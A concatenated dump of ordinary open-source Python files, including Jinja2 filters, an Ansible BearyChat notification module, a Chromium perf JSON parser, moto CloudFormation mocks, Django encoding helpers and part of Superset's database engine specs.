"""Mark a value as unsafe. This is the reverse operation for :func:`safe`."""
return text_type(value)
def do_reverse(value):
"""Reverse the object or return an iterator the iterates over it the other
way round.
"""
if isinstance(value, string_types):
return value[::-1]
try:
return reversed(value)
except TypeError:
try:
rv = list(value)
rv.reverse()
return rv
except TypeError:
raise FilterArgumentError('argument must be iterable')
@environmentfilter
def do_attr(environment, obj, name):
"""Get an attribute of an object. ``foo|attr("bar")`` works like
``foo["bar"]`` just that always an attribute is returned and items are not
looked up.
See :ref:`Notes on subscriptions <notes-on-subscriptions>` for more details.
"""
try:
name = str(name)
except UnicodeError:
pass
else:
try:
value = getattr(obj, name)
except AttributeError:
pass
else:
if environment.sandboxed and not \
environment.is_safe_attribute(obj, name, value):
return environment.unsafe_undefined(obj, name)
return value
return environment.undefined(obj=obj, name=name)
@contextfilter
def do_map(*args, **kwargs):
"""Applies a filter on a sequence of objects or looks up an attribute.
This is useful when dealing with lists of objects but you are really
only interested in a certain value of it.
The basic usage is mapping on an attribute. Imagine you have a list
of users but you are only interested in a list of usernames:
.. sourcecode:: jinja
Users on this page: {{ users|map(attribute='username')|join(', ') }}
Alternatively you can let it invoke a filter by passing the name of the
filter and the arguments afterwards. A good example would be applying a
text conversion filter on a sequence:
.. sourcecode:: jinja
Users on this page: {{ titles|map('lower')|join(', ') }}
.. versionadded:: 2.7
"""
context = args[0]
seq = args[1]
if len(args) == 2 and 'attribute' in kwargs:
attribute = kwargs.pop('attribute')
if kwargs:
raise FilterArgumentError('Unexpected keyword argument %r' %
next(iter(kwargs)))
func = make_attrgetter(context.environment, attribute)
else:
try:
name = args[2]
args = args[3:]
except LookupError:
raise FilterArgumentError('map requires a filter argument')
func = lambda item: context.environment.call_filter(
name, item, args, kwargs, context=context)
if seq:
for item in seq:
yield func(item)
@contextfilter
def do_select(*args, **kwargs):
"""Filters a sequence of objects by appying a test to the object and only
selecting the ones with the test succeeding.
Example usage:
.. sourcecode:: jinja
{{ numbers|select("odd") }}
{{ numbers|select("odd") }}
.. versionadded:: 2.7
"""
return _select_or_reject(args, kwargs, lambda x: x, False)
@contextfilter
def do_reject(*args, **kwargs):
"""Filters a sequence of objects by appying a test to the object and
rejecting the ones with the test succeeding.
Example usage:
.. sourcecode:: jinja
{{ numbers|reject("odd") }}
.. versionadded:: 2.7
"""
return _select_or_reject(args, kwargs, lambda x: not x, False)
@contextfilter
def do_selectattr(*args, **kwargs):
"""Filters a sequence of objects by appying a test to an attribute of an
object and only selecting the ones with the test succeeding.
Example usage:
.. sourcecode:: jinja
{{ users|selectattr("is_active") }}
{{ users|selectattr("email", "none") }}
.. versionadded:: 2.7
"""
return _select_or_reject(args, kwargs, lambda x: x, True)
@contextfilter
def do_rejectattr(*args, **kwargs):
"""Filters a sequence of objects by appying a test to an attribute of an
object or the attribute and rejecting the ones with the test succeeding.
.. sourcecode:: jinja
{{ users|rejectattr("is_active") }}
{{ users|rejectattr("email", "none") }}
.. versionadded:: 2.7
"""
return _select_or_reject(args, kwargs, lambda x: not x, True)
def _select_or_reject(args, kwargs, modfunc, lookup_attr):
context = args[0]
seq = args[1]
if lookup_attr:
try:
attr = args[2]
except LookupError:
raise FilterArgumentError('Missing parameter for attribute name')
transfunc = make_attrgetter(context.environment, attr)
off = 1
else:
off = 0
transfunc = lambda x: x
try:
name = args[2 + off]
args = args[3 + off:]
func = lambda item: context.environment.call_test(
name, item, args, kwargs)
except LookupError:
func = bool
if seq:
for item in seq:
if modfunc(func(transfunc(item))):
yield item
FILTERS = {
'attr': do_attr,
'replace': do_replace,
'upper': do_upper,
'lower': do_lower,
'escape': escape,
'e': escape,
'forceescape': do_forceescape,
'capitalize': do_capitalize,
'title': do_title,
'default': do_default,
'd': do_default,
'join': do_join,
'count': len,
'dictsort': do_dictsort,
'sort': do_sort,
'length': len,
'reverse': do_reverse,
'center': do_center,
'indent': do_indent,
'title': do_title,
'capitalize': do_capitalize,
'first': do_first,
'last': do_last,
'map': do_map,
'random': do_random,
'reject': do_reject,
'rejectattr': do_rejectattr,
'filesizeformat': do_filesizeformat,
'pprint': do_pprint,
'truncate': do_truncate,
'wordwrap': do_wordwrap,
'wordcount': do_wordcount,
'int': do_int,
'float': do_float,
'string': soft_unicode,
'list': do_list,
'urlize': do_urlize,
'format': do_format,
'trim': do_trim,
'striptags': do_striptags,
'select': do_select,
'selectattr': do_selectattr,
'slice': do_slice,
'batch': do_batch,
'sum': do_sum,
'abs': abs,
'round': do_round,
'groupby': do_groupby,
'safe': do_mark_safe,
'xmlattr': do_xmlattr,
'urlencode': do_urlencode
}
| gpl-3.0 |
amenonsen/ansible | lib/ansible/modules/notification/bearychat.py | 52 | 5908 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2016, Jiangge Zhang <tonyseek@gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['stableinterface'],
'supported_by': 'community'}
DOCUMENTATION = """
module: bearychat
short_description: Send BearyChat notifications
description:
- The M(bearychat) module sends notifications to U(https://bearychat.com)
via the Incoming Robot integration.
version_added: "2.4"
author: "Jiangge Zhang (@tonyseek)"
options:
url:
description:
- BearyChat WebHook URL. This authenticates you to the bearychat
service. It looks like
C(https://hook.bearychat.com/=ae2CF/incoming/e61bd5c57b164e04b11ac02e66f47f60).
required: true
text:
description:
- Message to send.
markdown:
description:
- If C(yes), text will be parsed as markdown.
default: 'yes'
type: bool
channel:
description:
- Channel to send the message to. If absent, the message goes to the
default channel selected by the I(url).
attachments:
description:
- Define a list of attachments. For more information, see
https://github.com/bearyinnovative/bearychat-tutorial/blob/master/robots/incoming.md#attachments
"""
EXAMPLES = """
- name: Send notification message via BearyChat
local_action:
module: bearychat
url: |
https://hook.bearychat.com/=ae2CF/incoming/e61bd5c57b164e04b11ac02e66f47f60
text: "{{ inventory_hostname }} completed"
- name: Send notification message via BearyChat all options
local_action:
module: bearychat
url: |
https://hook.bearychat.com/=ae2CF/incoming/e61bd5c57b164e04b11ac02e66f47f60
text: "{{ inventory_hostname }} completed"
markdown: no
channel: "#ansible"
attachments:
- title: "Ansible on {{ inventory_hostname }}"
text: "May the Force be with you."
color: "#ffffff"
images:
- http://example.com/index.png
"""
RETURN = """
msg:
description: execution result
returned: success
type: str
sample: "OK"
"""
try:
from ansible.module_utils.six.moves.urllib.parse import urlparse, urlunparse
HAS_URLPARSE = True
except Exception:
HAS_URLPARSE = False
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.urls import fetch_url
def build_payload_for_bearychat(module, text, markdown, channel, attachments):
payload = {}
if text is not None:
payload['text'] = text
if markdown is not None:
payload['markdown'] = markdown
if channel is not None:
payload['channel'] = channel
if attachments is not None:
payload.setdefault('attachments', []).extend(
build_payload_for_bearychat_attachment(
module, item.get('title'), item.get('text'), item.get('color'),
item.get('images'))
for item in attachments)
payload = 'payload=%s' % module.jsonify(payload)
return payload
def build_payload_for_bearychat_attachment(module, title, text, color, images):
attachment = {}
if title is not None:
attachment['title'] = title
if text is not None:
attachment['text'] = text
if color is not None:
attachment['color'] = color
if images is not None:
target_images = attachment.setdefault('images', [])
if not isinstance(images, (list, tuple)):
images = [images]
for image in images:
if isinstance(image, dict) and 'url' in image:
image = {'url': image['url']}
elif hasattr(image, 'startswith') and image.startswith('http'):
image = {'url': image}
else:
module.fail_json(
msg="BearyChat doesn't have support for this kind of "
"attachment image")
target_images.append(image)
return attachment
def do_notify_bearychat(module, url, payload):
response, info = fetch_url(module, url, data=payload)
if info['status'] != 200:
url_info = urlparse(url)
obscured_incoming_webhook = urlunparse(
(url_info.scheme, url_info.netloc, '[obscured]', '', '', ''))
module.fail_json(
msg=" failed to send %s to %s: %s" % (
payload, obscured_incoming_webhook, info['msg']))
def main():
module = AnsibleModule(argument_spec={
'url': dict(type='str', required=True, no_log=True),
'text': dict(type='str'),
'markdown': dict(default='yes', type='bool'),
'channel': dict(type='str'),
'attachments': dict(type='list'),
})
if not HAS_URLPARSE:
module.fail_json(msg='urlparse is not installed')
url = module.params['url']
text = module.params['text']
markdown = module.params['markdown']
channel = module.params['channel']
attachments = module.params['attachments']
payload = build_payload_for_bearychat(
module, text, markdown, channel, attachments)
do_notify_bearychat(module, url, payload)
module.exit_json(msg="OK")
if __name__ == '__main__':
main()
| gpl-3.0 |
AOKP/external_chromium_org | build/android/pylib/json_perf_parser.py | 47 | 4366 | # Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""A helper module for parsing JSON objects from perf tests results."""
import json
def GetAverageRunInfo(json_data, name):
"""Summarizes TraceEvent JSON data for performance metrics.
Example JSON Inputs (More tags can be added but these are required):
Measuring Duration:
[
{ "cat": "Java",
"ts": 10000000000,
"ph": "S",
"name": "TestTrace"
},
{ "cat": "Java",
"ts": 10000004000,
"ph": "F",
"name": "TestTrace"
},
...
]
Measuring Call Frequency (FPS):
[
{ "cat": "Java",
"ts": 10000000000,
"ph": "I",
"name": "TestTraceFPS"
},
{ "cat": "Java",
"ts": 10000004000,
"ph": "I",
"name": "TestTraceFPS"
},
...
]
Args:
json_data: A list of dictonaries each representing a JSON object.
name: The 'name' tag to filter on in the JSON file.
Returns:
A dictionary of result data with the following tags:
min: The minimum value tracked.
max: The maximum value tracked.
average: The average of all the values tracked.
count: The number of times the category/name pair was tracked.
type: The type of tracking ('Instant' for instant tags and 'Span' for
begin/end tags.
category: The passed in category filter.
name: The passed in name filter.
data_points: A list of all of the times used to generate this data.
units: The units for the values being reported.
Raises:
Exception: if entry contains invalid data.
"""
def EntryFilter(entry):
return entry['cat'] == 'Java' and entry['name'] == name
filtered_entries = filter(EntryFilter, json_data)
result = {}
result['min'] = -1
result['max'] = -1
result['average'] = 0
result['count'] = 0
result['type'] = 'Unknown'
result['category'] = 'Java'
result['name'] = name
result['data_points'] = []
result['units'] = ''
total_sum = 0
last_val = 0
val_type = None
for entry in filtered_entries:
if not val_type:
if 'mem' in entry:
val_type = 'mem'
def GetVal(entry):
return entry['mem']
result['units'] = 'kb'
elif 'ts' in entry:
val_type = 'ts'
def GetVal(entry):
return float(entry['ts']) / 1000.0
result['units'] = 'ms'
else:
raise Exception('Entry did not contain valid value info: %s' % entry)
if not val_type in entry:
raise Exception('Entry did not contain expected value type "%s" '
'information: %s' % (val_type, entry))
val = GetVal(entry)
if (entry['ph'] == 'S' and
(result['type'] == 'Unknown' or result['type'] == 'Span')):
result['type'] = 'Span'
last_val = val
elif ((entry['ph'] == 'F' and result['type'] == 'Span') or
(entry['ph'] == 'I' and (result['type'] == 'Unknown' or
result['type'] == 'Instant'))):
if last_val > 0:
delta = val - last_val
if result['min'] == -1 or result['min'] > delta:
result['min'] = delta
if result['max'] == -1 or result['max'] < delta:
result['max'] = delta
total_sum += delta
result['count'] += 1
result['data_points'].append(delta)
if entry['ph'] == 'I':
result['type'] = 'Instant'
last_val = val
if result['count'] > 0: result['average'] = total_sum / result['count']
return result
def GetAverageRunInfoFromJSONString(json_string, name):
"""Returns the results from GetAverageRunInfo using a JSON string.
Args:
json_string: The string containing JSON.
name: The 'name' tag to filter on in the JSON file.
Returns:
See GetAverageRunInfo Returns section.
"""
return GetAverageRunInfo(json.loads(json_string), name)
def GetAverageRunInfoFromFile(json_file, name):
"""Returns the results from GetAverageRunInfo using a JSON file.
Args:
json_file: The path to a JSON file.
name: The 'name' tag to filter on in the JSON file.
Returns:
See GetAverageRunInfo Returns section.
"""
with open(json_file, 'r') as f:
data = f.read()
perf = json.loads(data)
return GetAverageRunInfo(perf, name)
| bsd-3-clause |
DataDog/moto | moto/cloudformation/responses.py | 1 | 4294 | from __future__ import unicode_literals
import json
from jinja2 import Template
from moto.core.responses import BaseResponse
from .models import cloudformation_backend
class CloudFormationResponse(BaseResponse):
def create_stack(self):
stack_name = self._get_param('StackName')
stack_body = self._get_param('TemplateBody')
stack = cloudformation_backend.create_stack(
name=stack_name,
template=stack_body,
)
stack_body = {
'CreateStackResponse': {
'CreateStackResult': {
'StackId': stack.stack_id,
}
}
}
return json.dumps(stack_body)
def describe_stacks(self):
stack_name_or_id = None
if self._get_param('StackName'):
stack_name_or_id = self.querystring.get('StackName')[0]
stacks = cloudformation_backend.describe_stacks(stack_name_or_id)
template = Template(DESCRIBE_STACKS_TEMPLATE)
return template.render(stacks=stacks)
def describe_stack_resources(self):
stack_name = self._get_param('StackName')
stack = cloudformation_backend.get_stack(stack_name)
template = Template(LIST_STACKS_RESOURCES_RESPONSE)
return template.render(stack=stack)
def list_stacks(self):
stacks = cloudformation_backend.list_stacks()
template = Template(LIST_STACKS_RESPONSE)
return template.render(stacks=stacks)
def get_template(self):
name_or_stack_id = self.querystring.get('StackName')[0]
stack = cloudformation_backend.get_stack(name_or_stack_id)
return stack.template
# def update_stack(self):
# stack_name = self._get_param('StackName')
# stack_body = self._get_param('TemplateBody')
# stack = cloudformation_backend.update_stack(
# name=stack_name,
# template=stack_body,
# )
# stack_body = {
# 'UpdateStackResponse': {
# 'UpdateStackResult': {
# 'StackId': stack.name,
# }
# }
# }
# return json.dumps(stack_body)
def delete_stack(self):
name_or_stack_id = self.querystring.get('StackName')[0]
cloudformation_backend.delete_stack(name_or_stack_id)
return json.dumps({
'DeleteStackResponse': {
'DeleteStackResult': {},
}
})
DESCRIBE_STACKS_TEMPLATE = """<DescribeStacksResult>
<Stacks>
{% for stack in stacks %}
<member>
<StackName>{{ stack.name }}</StackName>
<StackId>{{ stack.stack_id }}</StackId>
<CreationTime>2010-07-27T22:28:28Z</CreationTime>
<StackStatus>{{ stack.status }}</StackStatus>
<DisableRollback>false</DisableRollback>
<Outputs>
{% for output in stack.stack_outputs %}
<member>
<OutputKey>{{ output.key }}</OutputKey>
<OutputValue>{{ output.value }}</OutputValue>
</member>
{% endfor %}
</Outputs>
</member>
{% endfor %}
</Stacks>
</DescribeStacksResult>"""
LIST_STACKS_RESPONSE = """<ListStacksResponse>
<ListStacksResult>
<StackSummaries>
{% for stack in stacks %}
<member>
<StackId>{{ stack.id }}</StackId>
<StackStatus>{{ stack.status }}</StackStatus>
<StackName>{{ stack.name }}</StackName>
<CreationTime>2011-05-23T15:47:44Z</CreationTime>
<TemplateDescription>{{ stack.description }}</TemplateDescription>
</member>
{% endfor %}
</StackSummaries>
</ListStacksResult>
</ListStacksResponse>"""
LIST_STACKS_RESOURCES_RESPONSE = """<DescribeStackResourcesResult>
<StackResources>
{% for resource in stack.stack_resources %}
<member>
<StackId>{{ stack.stack_id }}</StackId>
<StackName>{{ stack.name }}</StackName>
<LogicalResourceId>{{ resource.logical_resource_id }}</LogicalResourceId>
<PhysicalResourceId>{{ resource.physical_resource_id }}</PhysicalResourceId>
<ResourceType>{{ resource.type }}</ResourceType>
<Timestamp>2010-07-27T22:27:28Z</Timestamp>
<ResourceStatus>{{ stack.status }}</ResourceStatus>
</member>
{% endfor %}
</StackResources>
</DescribeStackResourcesResult>"""
| apache-2.0 |
linsalrob/EdwardsLab | crAssphage/check_duplicates.py | 1 | 1365 | """
Parse the NCBI file and check for duplicates. We ignore sample name, title, bioproject accession and description
"""
import os
import sys
import argparse
from roblib import bcolors
__author__ = 'Rob Edwards'
def parse_file(fi, verbose):
"""
Parse a file
:param: fi: File to parse
:param: verbose: more output
"""
ignore = set()
seen = {}
with open(fi, 'r') as f:
for l in f:
p=l.strip().split("\t")
if not ignore:
for c in ['sample_name', 'title', 'bioproject_accession', 'description']:
if c in p:
ignore.add(p.index(c))
continue
s=""
t=""
for i in (range(len(p))):
if i in ignore:
t += f"{bcolors.BLUE}{p[i]}{bcolors.WHITE}"+" | "
continue
t+=p[i]+" | "
s+=p[i]+" | "
if s in seen:
sys.stderr.write(f"{bcolors.RED}DUPLICATE:{bcolors.ENDC}: {seen[s]}\n")
seen[s]=t
if __name__ == "__main__":
parser = argparse.ArgumentParser(description=' ')
parser.add_argument('-f', help='input file', required=True)
parser.add_argument('-v', help='verbose output', action='store_true')
args = parser.parse_args()
parse_file(args.f, args.v)
| mit |
yongshengwang/hue | desktop/core/ext-py/Django-1.6.10/django/utils/encoding.py | 92 | 9512 | from __future__ import unicode_literals
import codecs
import datetime
from decimal import Decimal
import locale
import warnings
from django.utils.functional import Promise
from django.utils import six
from django.utils.six.moves.urllib.parse import quote
class DjangoUnicodeDecodeError(UnicodeDecodeError):
def __init__(self, obj, *args):
self.obj = obj
UnicodeDecodeError.__init__(self, *args)
def __str__(self):
original = UnicodeDecodeError.__str__(self)
return '%s. You passed in %r (%s)' % (original, self.obj,
type(self.obj))
class StrAndUnicode(object):
"""
A class that derives __str__ from __unicode__.
On Python 2, __str__ returns the output of __unicode__ encoded as a UTF-8
bytestring. On Python 3, __str__ returns the output of __unicode__.
Useful as a mix-in. If you support Python 2 and 3 with a single code base,
you can inherit this mix-in and just define __unicode__.
"""
def __init__(self, *args, **kwargs):
warnings.warn("StrAndUnicode is deprecated. Define a __str__ method "
"and apply the @python_2_unicode_compatible decorator "
"instead.", DeprecationWarning, stacklevel=2)
super(StrAndUnicode, self).__init__(*args, **kwargs)
if six.PY3:
def __str__(self):
return self.__unicode__()
else:
def __str__(self):
return self.__unicode__().encode('utf-8')
def python_2_unicode_compatible(klass):
"""
A decorator that defines __unicode__ and __str__ methods under Python 2.
Under Python 3 it does nothing.
To support Python 2 and 3 with a single code base, define a __str__ method
returning text and apply this decorator to the class.
"""
if six.PY2:
if '__str__' not in klass.__dict__:
raise ValueError("@python_2_unicode_compatible cannot be applied "
"to %s because it doesn't define __str__()." %
klass.__name__)
klass.__unicode__ = klass.__str__
klass.__str__ = lambda self: self.__unicode__().encode('utf-8')
return klass
def smart_text(s, encoding='utf-8', strings_only=False, errors='strict'):
"""
Returns a text object representing 's' -- unicode on Python 2 and str on
Python 3. Treats bytestrings using the 'encoding' codec.
If strings_only is True, don't convert (some) non-string-like objects.
"""
if isinstance(s, Promise):
# The input is the result of a gettext_lazy() call.
return s
return force_text(s, encoding, strings_only, errors)
def is_protected_type(obj):
"""Determine if the object instance is of a protected type.
Objects of protected types are preserved as-is when passed to
force_text(strings_only=True).
"""
return isinstance(obj, six.integer_types + (type(None), float, Decimal,
datetime.datetime, datetime.date, datetime.time))
def force_text(s, encoding='utf-8', strings_only=False, errors='strict'):
"""
Similar to smart_text, except that lazy instances are resolved to
strings, rather than kept as lazy objects.
If strings_only is True, don't convert (some) non-string-like objects.
"""
# Handle the common case first, saves 30-40% when s is an instance of
# six.text_type. This function gets called often in that setting.
if isinstance(s, six.text_type):
return s
if strings_only and is_protected_type(s):
return s
try:
if not isinstance(s, six.string_types):
if hasattr(s, '__unicode__'):
s = s.__unicode__()
else:
if six.PY3:
if isinstance(s, bytes):
s = six.text_type(s, encoding, errors)
else:
s = six.text_type(s)
else:
s = six.text_type(bytes(s), encoding, errors)
else:
# Note: We use .decode() here, instead of six.text_type(s, encoding,
# errors), so that if s is a SafeBytes, it ends up being a
# SafeText at the end.
s = s.decode(encoding, errors)
except UnicodeDecodeError as e:
if not isinstance(s, Exception):
raise DjangoUnicodeDecodeError(s, *e.args)
else:
# If we get to here, the caller has passed in an Exception
# subclass populated with non-ASCII bytestring data without a
# working unicode method. Try to handle this without raising a
# further exception by individually forcing the exception args
# to unicode.
s = ' '.join([force_text(arg, encoding, strings_only,
errors) for arg in s])
return s
def smart_bytes(s, encoding='utf-8', strings_only=False, errors='strict'):
"""
Returns a bytestring version of 's', encoded as specified in 'encoding'.
If strings_only is True, don't convert (some) non-string-like objects.
"""
if isinstance(s, Promise):
# The input is the result of a gettext_lazy() call.
return s
return force_bytes(s, encoding, strings_only, errors)
def force_bytes(s, encoding='utf-8', strings_only=False, errors='strict'):
"""
Similar to smart_bytes, except that lazy instances are resolved to
strings, rather than kept as lazy objects.
If strings_only is True, don't convert (some) non-string-like objects.
"""
if isinstance(s, six.memoryview):
s = bytes(s)
if isinstance(s, bytes):
if encoding == 'utf-8':
return s
else:
return s.decode('utf-8', errors).encode(encoding, errors)
if strings_only and (s is None or isinstance(s, int)):
return s
if isinstance(s, Promise):
return six.text_type(s).encode(encoding, errors)
if not isinstance(s, six.string_types):
try:
if six.PY3:
return six.text_type(s).encode(encoding)
else:
return bytes(s)
except UnicodeEncodeError:
if isinstance(s, Exception):
# An Exception subclass containing non-ASCII data that doesn't
# know how to print itself properly. We shouldn't raise a
# further exception.
return b' '.join([force_bytes(arg, encoding, strings_only,
errors) for arg in s])
return six.text_type(s).encode(encoding, errors)
else:
return s.encode(encoding, errors)
if six.PY3:
smart_str = smart_text
force_str = force_text
else:
smart_str = smart_bytes
force_str = force_bytes
# backwards compatibility for Python 2
smart_unicode = smart_text
force_unicode = force_text
smart_str.__doc__ = """\
Apply smart_text in Python 3 and smart_bytes in Python 2.
This is suitable for writing to sys.stdout (for instance).
"""
force_str.__doc__ = """\
Apply force_text in Python 3 and force_bytes in Python 2.
"""
def iri_to_uri(iri):
"""
Convert an Internationalized Resource Identifier (IRI) portion to a URI
portion that is suitable for inclusion in a URL.
This is the algorithm from section 3.1 of RFC 3987. However, since we are
assuming input is either UTF-8 or unicode already, we can simplify things a
little from the full method.
Returns an ASCII string containing the encoded result.
"""
# The list of safe characters here is constructed from the "reserved" and
# "unreserved" characters specified in sections 2.2 and 2.3 of RFC 3986:
# reserved = gen-delims / sub-delims
# gen-delims = ":" / "/" / "?" / "#" / "[" / "]" / "@"
# sub-delims = "!" / "$" / "&" / "'" / "(" / ")"
# / "*" / "+" / "," / ";" / "="
# unreserved = ALPHA / DIGIT / "-" / "." / "_" / "~"
# Of the unreserved characters, urllib.quote already considers all but
# the ~ safe.
# The % character is also added to the list of safe characters here, as the
# end of section 3.1 of RFC 3987 specifically mentions that % must not be
# converted.
if iri is None:
return iri
return quote(force_bytes(iri), safe=b"/#%[]=:;$&()+,!?*@'~")
def filepath_to_uri(path):
"""Convert a file system path to a URI portion that is suitable for
inclusion in a URL.
We are assuming input is either UTF-8 or unicode already.
This method will encode certain chars that would normally be recognized as
special chars for URIs. Note that this method does not encode the '
character, as it is a valid character within URIs. See
encodeURIComponent() JavaScript function for more details.
Returns an ASCII string containing the encoded result.
"""
if path is None:
return path
# I know about `os.sep` and `os.altsep` but I want to leave
# some flexibility for hardcoding separators.
return quote(force_bytes(path).replace(b"\\", b"/"), safe=b"/~!*()'")
def get_system_encoding():
"""
The encoding of the default system locale but falls back to the given
fallback encoding if the encoding is unsupported by python or could
not be determined. See tickets #10335 and #5846
"""
try:
encoding = locale.getdefaultlocale()[1] or 'ascii'
codecs.lookup(encoding)
except Exception:
encoding = 'ascii'
return encoding
DEFAULT_LOCALE_ENCODING = get_system_encoding()
| apache-2.0 |
simonz05/activity-feed | tests/helper.py | 1 | 1025 | import unittest
import datetime
from activity_feed import ActivityFeed
from activity_feed.utils import datetime_to_timestamp, utcnow
def timestamp(*args):
return datetime_to_timestamp(datetime.datetime(*args))
def timestamp_utcnow():
return datetime_to_timestamp(utcnow())
class BaseTest(unittest.TestCase):
def setUp(self):
self.a = ActivityFeed(redis='redis://:@localhost:6379/15')
self._empty()
def _empty(self):
a = self.a
keys = a.redis.keys('{}*'.format(a.namespace))
if keys:
a.redis.delete(*keys)
def add_items_to_feed(self, user_id, items_to_add=5, aggregate=None):
"""Helper method to add items to a given feed.
:param items_to_add: [int] Number of items to add to the feed.
"""
if aggregate is None:
aggregate = self.a.aggregate
now = timestamp_utcnow()
for i in range(1, items_to_add + 1):
self.a.update_item(user_id, i, now, aggregate)
now += 5
| mit |
dmigo/incubator-superset | superset/db_engine_specs.py | 1 | 56036 | # -*- coding: utf-8 -*-
# pylint: disable=C,R,W
"""Compatibility layer for different database engines
This modules stores logic specific to different database engines. Things
like time-related functions that are similar but not identical, or
information as to expose certain features or not and how to expose them.
For instance, Hive/Presto supports partitions and have a specific API to
list partitions. Other databases like Vertica also support partitions but
have different API to get to them. Other databases don't support partitions
at all. The classes here will use a common interface to specify all this.
The general idea is to use static classes and an inheritance scheme.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from collections import defaultdict, namedtuple
import inspect
import logging
import os
import re
import textwrap
import time
import boto3
from flask import g
from flask_babel import lazy_gettext as _
import pandas
import sqlalchemy as sqla
from sqlalchemy import select
from sqlalchemy.engine import create_engine
from sqlalchemy.engine.url import make_url
from sqlalchemy.sql import text
from sqlalchemy.sql.expression import TextAsFrom
import sqlparse
from tableschema import Table
from werkzeug.utils import secure_filename
from superset import app, cache_util, conf, db, utils
from superset.exceptions import SupersetTemplateException
from superset.utils import QueryStatus
config = app.config
tracking_url_trans = conf.get('TRACKING_URL_TRANSFORMER')
hive_poll_interval = conf.get('HIVE_POLL_INTERVAL')
Grain = namedtuple('Grain', 'name label function duration')
class LimitMethod(object):
"""Enum the ways that limits can be applied"""
FETCH_MANY = 'fetch_many'
WRAP_SQL = 'wrap_sql'
FORCE_LIMIT = 'force_limit'
class BaseEngineSpec(object):
"""Abstract class for database engine specific configurations"""
engine = 'base' # str as defined in sqlalchemy.engine.engine
cursor_execute_kwargs = {}
time_grains = tuple()
time_groupby_inline = False
limit_method = LimitMethod.FORCE_LIMIT
time_secondary_columns = False
inner_joins = True
@classmethod
def fetch_data(cls, cursor, limit):
if cls.limit_method == LimitMethod.FETCH_MANY:
return cursor.fetchmany(limit)
return cursor.fetchall()
@classmethod
def epoch_to_dttm(cls):
raise NotImplementedError()
@classmethod
def epoch_ms_to_dttm(cls):
return cls.epoch_to_dttm().replace('{col}', '({col}/1000.0)')
@classmethod
def extra_table_metadata(cls, database, table_name, schema_name):
"""Returns engine-specific table metadata"""
return {}
@classmethod
def apply_limit_to_sql(cls, sql, limit, database):
"""Alters the SQL statement to apply a LIMIT clause"""
if cls.limit_method == LimitMethod.WRAP_SQL:
sql = sql.strip('\t\n ;')
qry = (
select('*')
.select_from(
TextAsFrom(text(sql), ['*']).alias('inner_qry'),
)
.limit(limit)
)
return database.compile_sqla_query(qry)
elif LimitMethod.FORCE_LIMIT:
sql_without_limit = cls.get_query_without_limit(sql)
return '{sql_without_limit} LIMIT {limit}'.format(**locals())
return sql
@classmethod
def get_limit_from_sql(cls, sql):
limit_pattern = re.compile(r"""
(?ix) # case insensitive, verbose
\s+ # whitespace
LIMIT\s+(\d+) # LIMIT $ROWS
;? # optional semi-colon
(\s|;)*$ # remove trailing spaces tabs or semicolons
""")
matches = limit_pattern.findall(sql)
if matches:
return int(matches[0][0])
@classmethod
def get_query_without_limit(cls, sql):
return re.sub(r"""
(?ix) # case insensitive, verbose
\s+ # whitespace
LIMIT\s+\d+ # LIMIT $ROWS
;? # optional semi-colon
(\s|;)*$ # remove trailing spaces tabs or semicolons
""", '', sql)
@staticmethod
def csv_to_df(**kwargs):
kwargs['filepath_or_buffer'] = \
config['UPLOAD_FOLDER'] + kwargs['filepath_or_buffer']
kwargs['encoding'] = 'utf-8'
kwargs['iterator'] = True
chunks = pandas.read_csv(**kwargs)
df = pandas.DataFrame()
df = pandas.concat(chunk for chunk in chunks)
return df
@staticmethod
def df_to_db(df, table, **kwargs):
df.to_sql(**kwargs)
table.user_id = g.user.id
table.schema = kwargs['schema']
table.fetch_metadata()
db.session.add(table)
db.session.commit()
@staticmethod
def create_table_from_csv(form, table):
def _allowed_file(filename):
# Only allow specific file extensions as specified in the config
extension = os.path.splitext(filename)[1]
return extension and extension[1:] in config['ALLOWED_EXTENSIONS']
filename = secure_filename(form.csv_file.data.filename)
if not _allowed_file(filename):
raise Exception('Invalid file type selected')
kwargs = {
'filepath_or_buffer': filename,
'sep': form.sep.data,
'header': form.header.data if form.header.data else 0,
'index_col': form.index_col.data,
'mangle_dupe_cols': form.mangle_dupe_cols.data,
'skipinitialspace': form.skipinitialspace.data,
'skiprows': form.skiprows.data,
'nrows': form.nrows.data,
'skip_blank_lines': form.skip_blank_lines.data,
'parse_dates': form.parse_dates.data,
'infer_datetime_format': form.infer_datetime_format.data,
'chunksize': 10000,
}
df = BaseEngineSpec.csv_to_df(**kwargs)
df_to_db_kwargs = {
'table': table,
'df': df,
'name': form.name.data,
'con': create_engine(form.con.data.sqlalchemy_uri_decrypted, echo=False),
'schema': form.schema.data,
'if_exists': form.if_exists.data,
'index': form.index.data,
'index_label': form.index_label.data,
'chunksize': 10000,
}
BaseEngineSpec.df_to_db(**df_to_db_kwargs)
@classmethod
def convert_dttm(cls, target_type, dttm):
return "'{}'".format(dttm.strftime('%Y-%m-%d %H:%M:%S'))
@classmethod
@cache_util.memoized_func(
timeout=600,
key=lambda *args, **kwargs: 'db:{}:{}'.format(args[0].id, args[1]))
def fetch_result_sets(cls, db, datasource_type, force=False):
"""Returns the dictionary {schema : [result_set_name]}.
Datasource_type can be 'table' or 'view'.
Empty schema corresponds to the list of full names of the all
tables or views: <schema>.<result_set_name>.
"""
schemas = db.inspector.get_schema_names()
result_sets = {}
all_result_sets = []
for schema in schemas:
if datasource_type == 'table':
result_sets[schema] = sorted(
db.inspector.get_table_names(schema))
elif datasource_type == 'view':
result_sets[schema] = sorted(
db.inspector.get_view_names(schema))
all_result_sets += [
'{}.{}'.format(schema, t) for t in result_sets[schema]]
if all_result_sets:
result_sets[''] = all_result_sets
return result_sets
@classmethod
